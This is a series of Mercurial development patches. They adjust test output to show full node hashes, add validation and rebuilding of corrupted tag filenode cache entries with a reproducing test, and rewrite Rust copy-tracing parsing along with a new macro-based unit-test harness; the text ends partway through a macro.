data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !) + ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) + ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !) ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !) $ hg up -q -R renames.repo diff --git a/tests/test-convert-hg-source.t b/tests/test-convert-hg-source.t --- a/tests/test-convert-hg-source.t +++ b/tests/test-convert-hg-source.t @@ -182,7 +182,7 @@ sorting... converting... 
4 init - ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !) + ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !) ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !) 3 changeall 2 changebagain diff --git a/tests/test-hgweb-filelog.t b/tests/test-hgweb-filelog.t --- a/tests/test-hgweb-filelog.t +++ b/tests/test-hgweb-filelog.t @@ -656,7 +656,7 @@ An error occurred while processing your request: </p> <p> - a@6563da9dcf87: not found in manifest + a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest </p> </div> </div> diff --git a/tests/test-hgweb.t b/tests/test-hgweb.t --- a/tests/test-hgweb.t +++ b/tests/test-hgweb.t @@ -149,7 +149,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] $ get-with-headers.py localhost:$HGPORT 'file/tip/bork' 404 Not Found @@ -202,7 +202,7 @@ An error occurred while processing your request: </p> <p> - bork@2ef0ac749a14: not found in manifest + bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest </p> </div> </div> @@ -218,7 +218,7 @@ 404 Not Found - error: bork@2ef0ac749a14: not found in manifest + error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest [1] try bad style diff --git a/tests/test-hgwebdir.t b/tests/test-hgwebdir.t --- a/tests/test-hgwebdir.t +++ b/tests/test-hgwebdir.t @@ -103,7 +103,7 @@ 404 Not Found - error: bork@8580ff50825a: not found in manifest + error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest [1] should succeed diff --git a/tests/test-narrow-exchange.t b/tests/test-narrow-exchange.t --- a/tests/test-narrow-exchange.t +++ b/tests/test-narrow-exchange.t @@ -105,7 +105,7 @@ remote: adding file changes remote: transaction abort! remote: rollback completed - remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !) 
+ remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !) remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !) abort: stream ended unexpectedly (got 0 bytes, expected 4) [255] @@ -218,8 +218,8 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !) - remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) remote: transaction abort! (lfs-on !) remote: rollback completed (lfs-on !) - remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !) + remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !) abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !) diff --git a/tests/test-pull-bundle.t b/tests/test-pull-bundle.t --- a/tests/test-pull-bundle.t +++ b/tests/test-pull-bundle.t @@ -185,7 +185,7 @@ adding changesets adding manifests adding file changes - abort: 00changelog.i@66f7d451a68b: no node + abort: 00changelog.i@66f7d451a68b85ed82ff5fcc254daf50c74144bd: no node [50] $ cd .. $ killdaemons.py # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613481222 -19800 # Tue Feb 16 18:43:42 2021 +0530 # Node ID 75832107ec07034e44d2fe3e1f375ed325d86abb # Parent 6fc57680cfd64aa4f1843b44402c6661aed7cb9d hgtagsfnodes: refactor code to compute fnode into separate fn I plan to use this code at one more place while fixing a bug caused by an invalid fnode present in cache. 
Differential Revision: https://phab.mercurial-scm.org/D10013 diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -777,6 +777,15 @@ return False return None + fnode = self._computefnode(node) + self._writeentry(offset, properprefix, fnode) + return fnode + + def _computefnode(self, node): + """Finds the tag filenode for a node which is missing or invalid + in cache""" + ctx = self._repo[node] + rev = ctx.rev() fnode = None cl = self._repo.changelog p1rev, p2rev = cl._uncheckedparentrevs(rev) @@ -804,8 +813,6 @@ except error.LookupError: # No .hgtags file on this revision. fnode = nullid - - self._writeentry(offset, properprefix, fnode) return fnode def setfnode(self, node, fnode): # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613488094 -19800 # Tue Feb 16 20:38:14 2021 +0530 # Node ID 9306a16ca96439123f5a34381cd74378d62f95f0 # Parent 75832107ec07034e44d2fe3e1f375ed325d86abb debugcommands: prevent using `is False` I was touching this code in a future patch and marmoute warned about usage of `is False` here. 
Quoting marmoute: ``` "is False" is going to check if the object you have the very same object in memory than the one Python allocated for False (in practice 0) This will "mostly work" on cpython because of implementation details, but is semantically wrong and can start breaking unexpectedly ``` Differential Revision: https://phab.mercurial-scm.org/D10014 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3870,10 +3870,10 @@ tagsnode = cache.getfnode(node, computemissing=False) if tagsnode: tagsnodedisplay = hex(tagsnode) - elif tagsnode is False: + elif tagsnode is None: + tagsnodedisplay = b'missing' + else: tagsnodedisplay = b'invalid' - else: - tagsnodedisplay = b'missing' ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1608830626 18000 # Thu Dec 24 12:23:46 2020 -0500 # Node ID 9ea6b75b4a95f9f98aed6c895bb92a80f6e824e9 # Parent 9306a16ca96439123f5a34381cd74378d62f95f0 tests: demonstrate a case where a corrupt tag cache causes an abort I happened to hit this trying to cover other cases around valid vs missing entries. I have no idea if this is something that could occur more naturally (similar to how a missing file node in `hgtagsfnodes1` can occur after a strip). There is a test just above this added in f5a7cf0adb12 mentioning it "overwrites the junk", though that tests truncation instead of actual garbage. But since this is just a cache, it probably shouldn't abort with a cryptic message like this. The two options I see both have downsides- either rebuild the cache (and potentially take a long time), or hint to the user to run a debug command. 
Differential Revision: https://phab.mercurial-scm.org/D9812 diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -417,6 +417,49 @@ tip 5:8dbfe60eff30 bar 1:78391a272241 +BUG: If the filenode part of an entry in hgtagsfnodes is corrupt and +tags2-visible is missing, `hg tags` aborts. Corrupting the leading 4 bytes of +node hash (as above) doesn't seem to trigger the issue. Also note that the +debug command hides the corruption, both with and without tags2-visible. + + $ mv .hg/cache/hgtagsfnodes1 .hg/cache/hgtagsfnodes1.bak + $ hg debugupdatecaches + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-16, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: bb d1 79 df 00 00 00 00 00 00 00 00 00 00 00 00 |..y.............| + 0010: 00 00 00 00 00 00 00 00 78 39 1a 27 0c 04 f2 a8 |........x9.'....| + 0020: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d 8d bf e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: de ad de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |......B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + + $ rm -f .hg/cache/tags2-visible + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + + $ hg tags + abort: 
data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found + [50] + +BUG: Unless this file is restored, the `hg tags` in the next unix-permissions +conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" + + $ mv .hg/cache/hgtagsfnodes1.bak .hg/cache/hgtagsfnodes1 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613389098 -19800 # Mon Feb 15 17:08:18 2021 +0530 # Node ID e4e971abb6a35358d06122e5df927c80bab54e83 # Parent 9ea6b75b4a95f9f98aed6c895bb92a80f6e824e9 debugtagscache: verify that filenode is correct Previous patch from Matt demonstrates that `debugtagscache` does not warn about filenode being unknown which can be caused by a corrupted cache. We start by showing that it's an unknown node. Differential Revision: https://phab.mercurial-scm.org/D10015 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3865,11 +3865,14 @@ def debugtagscache(ui, repo): """display the contents of .hg/cache/hgtagsfnodes1""" cache = tagsmod.hgtagsfnodescache(repo.unfiltered()) + flog = repo.file(b'.hgtags') for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) if tagsnode: tagsnodedisplay = hex(tagsnode) + if not flog.hasnode(tagsnode): + tagsnodedisplay += b' (unknown node)' elif tagsnode is None: tagsnodedisplay = b'missing' else: diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -444,12 +444,12 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ rm -f .hg/cache/tags2-visible $ hg debugtagscache | tail -2 4 
0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ hg tags abort: data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1614623545 -19800 # Tue Mar 02 00:02:25 2021 +0530 # Node ID 9a31f65381ae1404db8c908197eda610dbecc080 # Parent e4e971abb6a35358d06122e5df927c80bab54e83 tags: validate nodes in _getfnodes() and update cache in case of unknown nodes `hgtagsfnodescache` can contain unknown nodes due to cache corruption and this leads to a traceback on operations like `hg tags` as we don't validate nodes. This patch validates that all filenodes returned by `hgtagsfnodescache` are known to the repository. If there exists any unknown filenode, we forcibly recompute it and update the cache. The test change demonstrates the fix.
Differential Revision: https://phab.mercurial-scm.org/D10083 diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -494,11 +494,25 @@ starttime = util.timer() fnodescache = hgtagsfnodescache(repo.unfiltered()) cachefnode = {} + validated_fnodes = set() + unknown_entries = set() for node in nodes: fnode = fnodescache.getfnode(node) + flog = repo.file(b'.hgtags') if fnode != nullid: + if fnode not in validated_fnodes: + if flog.hasnode(fnode): + validated_fnodes.add(fnode) + else: + unknown_entries.add(node) cachefnode[node] = fnode + if unknown_entries: + fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries) + for node, fnode in pycompat.iteritems(fixed_nodemap): + if fnode != nullid: + cachefnode[node] = fnode + fnodescache.write() duration = util.timer() - starttime @@ -826,6 +840,21 @@ self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode) + def refresh_invalid_nodes(self, nodes): + """recomputes file nodes for a given set of nodes which has unknown + filenodes for them in the cache + Also updates the in-memory cache with the correct filenode. + Caller needs to take care about calling `.write()` so that updates are + persisted. + Returns a map {node: recomputed fnode} + """ + fixed_nodemap = {} + for node in nodes: + fnode = self._computefnode(node) + fixed_nodemap[node] = fnode + self.setfnode(node, fnode) + return fixed_nodemap + def _writeentry(self, offset, prefix, fnode): # Slices on array instances only accept other array. 
entry = bytearray(prefix + fnode) diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -452,8 +452,8 @@ 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8deadde17fab7422878ee5a2dadbc943d (unknown node) $ hg tags - abort: data/.hgtags.i@0c04f2a8deadde17fab7422878ee5a2dadbc943d: no match found - [50] + tip 5:8dbfe60eff30 + bar 1:78391a272241 BUG: Unless this file is restored, the `hg tags` in the next unix-permissions conditional will fail: "abort: data/.hgtags.i@0c04f2a8dead: no match found" # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1609971119 -3600 # Wed Jan 06 23:11:59 2021 +0100 # Node ID f977a065c7c2bed8b74375312791b79de26a7cb2 # Parent 9a31f65381ae1404db8c908197eda610dbecc080 copies-rust: rewrite ChangedFiles binary parsing by using the new `bytes-cast` crate and a custom struct that encodes the expected data structure. Differential Revision: https://phab.mercurial-scm.org/D10068 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -3,13 +3,13 @@ use crate::Revision; use crate::NULL_REVISION; +use bytes_cast::{unaligned, BytesCast}; use im_rc::ordmap::Entry; use im_rc::ordmap::OrdMap; use im_rc::OrdSet; use std::cmp::Ordering; use std::collections::HashMap; -use std::convert::TryInto; pub type PathCopies = HashMap<HgPathBuf, HgPathBuf>; @@ -110,18 +110,6 @@ /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; -/// represent the files affected by a changesets -/// -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it. -/// This hold a subset of mercurial.metadata.ChangingFiles as we do not need -/// all the data categories tracked by it.
-pub struct ChangedFiles<'a> { - nb_items: u32, - index: &'a [u8], - data: &'a [u8], -} - /// Represent active changes that affect the copy tracing. enum Action<'a> { /// The parent ? children edge is removing a file @@ -148,9 +136,6 @@ Normal, } -type FileChange<'a> = (u8, &'a HgPath, &'a HgPath); - -const EMPTY: &[u8] = b""; const COPY_MASK: u8 = 3; const P1_COPY: u8 = 2; const P2_COPY: u8 = 3; @@ -159,141 +144,94 @@ const MERGED: u8 = 8; const SALVAGED: u8 = 16; -impl<'a> ChangedFiles<'a> { - const INDEX_START: usize = 4; - const ENTRY_SIZE: u32 = 9; - const FILENAME_START: u32 = 1; - const COPY_SOURCE_START: u32 = 5; +#[derive(BytesCast)] +#[repr(C)] +struct ChangedFilesIndexEntry { + flags: u8, - pub fn new(data: &'a [u8]) -> Self { - assert!( - data.len() >= 4, - "data size ({}) is too small to contain the header (4)", - data.len() - ); - let nb_items_raw: [u8; 4] = (&data[0..=3]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - let nb_items = u32::from_be_bytes(nb_items_raw); + /// Only the end position is stored. The start is at the end of the + /// previous entry. + destination_path_end_position: unaligned::U32Be, - let index_size = (nb_items * Self::ENTRY_SIZE) as usize; - let index_end = Self::INDEX_START + index_size; + source_index_entry_position: unaligned::U32Be, +} + +fn _static_assert_size_of() { + let _ = std::mem::transmute::<ChangedFilesIndexEntry, [u8; 9]>; +} - assert!( - data.len() >= index_end, - "data size ({}) is too small to fit the index_data ({})", - data.len(), - index_end - ); +/// Represents the files affected by a changeset. +/// +/// This holds a subset of `mercurial.metadata.ChangingFiles` as we do not need +/// all the data categories tracked by it. 
+pub struct ChangedFiles<'a> { + index: &'a [ChangedFilesIndexEntry], + paths: &'a [u8], +} - let ret = ChangedFiles { - nb_items, - index: &data[Self::INDEX_START..index_end], - data: &data[index_end..], - }; - let max_data = ret.filename_end(nb_items - 1) as usize; - assert!( - ret.data.len() >= max_data, - "data size ({}) is too small to fit all data ({})", - data.len(), - index_end + max_data - ); - ret +impl<'a> ChangedFiles<'a> { + pub fn new(data: &'a [u8]) -> Self { + let (header, rest) = unaligned::U32Be::from_bytes(data).unwrap(); + let nb_index_entries = header.get() as usize; + let (index, paths) = + ChangedFilesIndexEntry::slice_from_bytes(rest, nb_index_entries) + .unwrap(); + Self { index, paths } } pub fn new_empty() -> Self { ChangedFiles { - nb_items: 0, - index: EMPTY, - data: EMPTY, + index: &[], + paths: &[], } } - /// internal function to return an individual entry at a given index - fn entry(&'a self, idx: u32) -> FileChange<'a> { - if idx >= self.nb_items { - panic!( - "index for entry is higher that the number of file {} >= {}", - idx, self.nb_items - ) - } - let flags = self.flags(idx); - let filename = self.filename(idx); - let copy_idx = self.copy_idx(idx); - let copy_source = self.filename(copy_idx); - (flags, filename, copy_source) - } - - /// internal function to return the filename of the entry at a given index - fn filename(&self, idx: u32) -> &HgPath { - let filename_start; - if idx == 0 { - filename_start = 0; + /// Internal function to return the filename of the entry at a given index + fn path(&self, idx: usize) -> &HgPath { + let start = if idx == 0 { + 0 } else { - filename_start = self.filename_end(idx - 1) - } - let filename_end = self.filename_end(idx); - let filename_start = filename_start as usize; - let filename_end = filename_end as usize; - HgPath::new(&self.data[filename_start..filename_end]) - } - - /// internal function to return the flag field of the entry at a given - /// index - fn flags(&self, idx: u32) -> u8 { 
- let idx = idx as usize; - self.index[idx * (Self::ENTRY_SIZE as usize)] - } - - /// internal function to return the end of a filename part at a given index - fn filename_end(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::FILENAME_START; - let end = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) - } - - /// internal function to return index of the copy source of the entry at a - /// given index - fn copy_idx(&self, idx: u32) -> u32 { - let start = (idx * Self::ENTRY_SIZE) + Self::COPY_SOURCE_START; - let end = (idx + 1) * Self::ENTRY_SIZE; - let start = start as usize; - let end = end as usize; - let raw = (&self.index[start..end]) - .try_into() - .expect("failed to turn 4 bytes into 4 bytes"); - u32::from_be_bytes(raw) + self.index[idx - 1].destination_path_end_position.get() as usize + }; + let end = self.index[idx].destination_path_end_position.get() as usize; + HgPath::new(&self.paths[start..end]) } /// Return an iterator over all the `Action` in this instance. 
- fn iter_actions(&self) -> ActionsIterator { - ActionsIterator { - changes: &self, - current: 0, - } + fn iter_actions(&self) -> impl Iterator<Item = Action> { + self.index.iter().enumerate().flat_map(move |(idx, entry)| { + let path = self.path(idx); + if (entry.flags & ACTION_MASK) == REMOVED { + Some(Action::Removed(path)) + } else if (entry.flags & COPY_MASK) == P1_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP1(path, self.path(source_idx))) + } else if (entry.flags & COPY_MASK) == P2_COPY { + let source_idx = + entry.source_index_entry_position.get() as usize; + Some(Action::CopiedFromP2(path, self.path(source_idx))) + } else { + None + } + }) } /// return the MergeCase value associated with a filename fn get_merge_case(&self, path: &HgPath) -> MergeCase { - if self.nb_items == 0 { + if self.index.is_empty() { return MergeCase::Normal; } let mut low_part = 0; - let mut high_part = self.nb_items; + let mut high_part = self.index.len(); while low_part < high_part { let cursor = (low_part + high_part - 1) / 2; - let (flags, filename, _source) = self.entry(cursor); - match path.cmp(filename) { + match path.cmp(self.path(cursor)) { Ordering::Less => low_part = cursor + 1, Ordering::Greater => high_part = cursor, Ordering::Equal => { - return match flags & ACTION_MASK { + return match self.index[cursor].flags & ACTION_MASK { MERGED => MergeCase::Merged, SALVAGED => MergeCase::Salvaged, _ => MergeCase::Normal, @@ -305,32 +243,6 @@ } } -struct ActionsIterator<'a> { - changes: &'a ChangedFiles<'a>, - current: u32, -} - -impl<'a> Iterator for ActionsIterator<'a> { - type Item = Action<'a>; - - fn next(&mut self) -> Option<Action<'a>> { - while self.current < self.changes.nb_items { - let (flags, file, source) = self.changes.entry(self.current); - self.current += 1; - if (flags & ACTION_MASK) == REMOVED { - return Some(Action::Removed(file)); - } - let copy = flags & COPY_MASK; - if copy == P1_COPY { - return 
Some(Action::CopiedFromP1(file, source)); - } else if copy == P2_COPY { - return Some(Action::CopiedFromP2(file, source)); - } - } - return None; - } -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1610368380 -3600 # Mon Jan 11 13:33:00 2021 +0100 # Node ID fa21633af20198d9006ced9a0eae063af08df165 # Parent f977a065c7c2bed8b74375312791b79de26a7cb2 copies-rust: add a macro-based unit-testing framework `compare_values`, `merge_copies_dict`, and `CombineChangesetCopies` are APIs whose signatures involve non-trivial types. Calling them directly in unit tests would involve a lot of verbose setup code that obscures the meaningful parts of a given test case. This adds a macro-based test-harness with pseudo-syntax to tersely create arguments and expected return values in the correct types. For now there is only one (not particularly meaningful) test case per tested function, just to exercise the macros. 
Differential Revision: https://phab.mercurial-scm.org/D10071 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -1,3 +1,10 @@ +#[cfg(test)] +#[macro_use] +mod tests_support; + +#[cfg(test)] +mod tests; + use crate::utils::hg_path::HgPath; use crate::utils::hg_path::HgPathBuf; use crate::Revision; diff --git a/rust/hg-core/src/copy_tracing/tests.rs b/rust/hg-core/src/copy_tracing/tests.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests.rs @@ -0,0 +1,141 @@ +use super::*; + +/// Unit tests for: +/// +/// ```ignore +/// fn compare_value( +/// current_merge: Revision, +/// merge_case_for_dest: impl Fn() -> MergeCase, +/// src_minor: &CopySource, +/// src_major: &CopySource, +/// ) -> (MergePick, /* overwrite: */ bool) +/// ``` +#[test] +fn test_compare_value() { + // The `compare_value!` macro calls the `compare_value` function with + // arguments given in pseudo-syntax: + // + // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead + // of a closure. + // * `CopySource` values are represented as `(rev, path, overwritten)` + // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`. + // * `PathToken` is an integer not read by `compare_value`. It only checks + // for `Some(_)` indicating a file copy vs. `None` for a file deletion. + // * `OrdSet<Revision>` is represented as a Python-like set literal. 
+ + use MergeCase::*; + use MergePick::*; + + assert_eq!( + compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })), + (Any, false) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// fn merge_copies_dict( +/// path_map: &TwoWayPathMap, // Not visible in test cases +/// current_merge: Revision, +/// minor: InternalPathCopies, +/// major: InternalPathCopies, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) -> InternalPathCopies +/// ``` +#[test] +fn test_merge_copies_dict() { + // The `merge_copies_dict!` macro calls the `merge_copies_dict` function + // with arguments given in pseudo-syntax: + // + // * `TwoWayPathMap` and path tokenization are implicitly taken care of. + // All paths are given as string literals. + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `InternalPathCopies` is a map of copy destination path keys to + // `CopySource` values. + // - `CopySource` is represented as a `(rev, source_path, overwritten)` + // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`. + // - Unlike in `test_compare_value`, source paths are string literals. + // - `OrdSet<Revision>` is again represented as a Python-like set + // literal. + // * `get_merge_case` is represented as a map of copy destination path to + // `MergeCase`. The default for paths not in the map is + // `MergeCase::Normal`. + // + // `internal_path_copies!` creates an `InternalPathCopies` value with the + // same pseudo-syntax as in `merge_copies_dict!`. 
+ + use MergeCase::*; + + assert_eq!( + merge_copies_dict!( + 1, + {"foo" => (1, None, {})}, + {}, + {"foo" => Merged} + ), + internal_path_copies!("foo" => (1, None, {})) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// impl CombineChangesetCopies { +/// fn new(children_count: HashMap<Revision, usize>) -> Self +/// +/// // Called repeatedly: +/// fn add_revision_inner<'a>( +/// &mut self, +/// rev: Revision, +/// p1: Revision, +/// p2: Revision, +/// copy_actions: impl Iterator<Item = Action<'a>>, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) +/// +/// fn finish(mut self, target_rev: Revision) -> PathCopies +/// } +/// ``` +#[test] +fn test_combine_changeset_copies() { + // `combine_changeset_copies!` creates a `CombineChangesetCopies` with + // `new`, then calls `add_revision_inner` repeatedly, then calls `finish` + // for its return value. + // + // All paths are given as string literals. + // + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `children_count` is a map of revision numbers to count of children in + // the DAG. It includes all revisions that should be considered by the + // algorithm. + // * Calls to `add_revision_inner` are represented as an array of anonymous + // structs with named fields, one pseudo-struct per call. + // + // `path_copies!` creates a `PathCopies` value, a map of copy destination + // keys to copy source values. Note: the arrows for map literal syntax + // point **backwards** compared to the logical direction of copy! 
+ + use crate::NULL_REVISION as NULL; + use Action::*; + use MergeCase::*; + + assert_eq!( + combine_changeset_copies!( + { 1 => 1, 2 => 1 }, + [ + { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { + rev: 3, p1: 1, p2: 2, + actions: [CopiedFromP1("destination.txt", "source.txt")], + merge_cases: {"destination.txt" => Merged}, + }, + ], + 3, + ), + path_copies!("destination.txt" => "source.txt") + ); +} diff --git a/rust/hg-core/src/copy_tracing/tests_support.rs b/rust/hg-core/src/copy_tracing/tests_support.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests_support.rs @@ -0,0 +1,199 @@ +//! Supporting macros for `tests.rs` in the same directory. +//! See comments there for usage. + +/// Python-like set literal +macro_rules! set { + ( + $Type: ty { + $( $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($value); )* + set + }} +} + +/// `{key => value}` map literal +macro_rules! map { + ( + $Type: ty { + $( $key: expr => $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($key, $value); )* + set + }} +} + +macro_rules! copy_source { + ($rev: expr, $path: expr, $overwritten: tt) => { + CopySource { + rev: $rev, + path: $path, + overwritten: set!(OrdSet<Revision> $overwritten), + } + }; +} + +macro_rules! compare_value { + ( + $merge_revision: expr, + $merge_case_for_dest: ident, + ($min_rev: expr, $min_path: expr, $min_overwrite: tt), + ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)? + ) => { + compare_value( + $merge_revision, + || $merge_case_for_dest, + ©_source!($min_rev, $min_path, $min_overwrite), + ©_source!($maj_rev, $maj_path, $maj_overwrite), + ) + }; +} + +macro_rules! 
tokenized_path_copies { + ( + $path_map: ident, {$( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt + ) + ),*} + $(,)* + ) => { + map!(InternalPathCopies {$( + $path_map.tokenize(HgPath::new($dest)) => + copy_source!( + $src_rev, + Option::map($src_path, |p: &str| { + $path_map.tokenize(HgPath::new(p)) + }), + $src_overwrite + ) + )*}) + } +} + +macro_rules! merge_case_callback { + ( + $( $merge_path: expr => $merge_case: ident ),* + $(,)? + ) => { + #[allow(unused)] + |merge_path| -> MergeCase { + $( + if (merge_path == HgPath::new($merge_path)) { + return $merge_case + } + )* + MergeCase::Normal + } + }; +} + +macro_rules! merge_copies_dict { + ( + $current_merge: expr, + $minor_copies: tt, + $major_copies: tt, + $get_merge_case: tt $(,)? + ) => { + { + #[allow(unused_mut)] + let mut map = TwoWayPathMap::default(); + let minor = tokenized_path_copies!(map, $minor_copies); + let major = tokenized_path_copies!(map, $major_copies); + merge_copies_dict( + &map, $current_merge, minor, major, + merge_case_callback! $get_merge_case, + ) + .into_iter() + .map(|(token, source)| { + ( + map.untokenize(token).to_string(), + ( + source.rev, + source.path.map(|t| map.untokenize(t).to_string()), + source.overwritten.into_iter().collect(), + ), + ) + }) + .collect::<OrdMap<_, _>>() + } + }; +} + +macro_rules! internal_path_copies { + ( + $( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt $(,)? + ) + ),* + 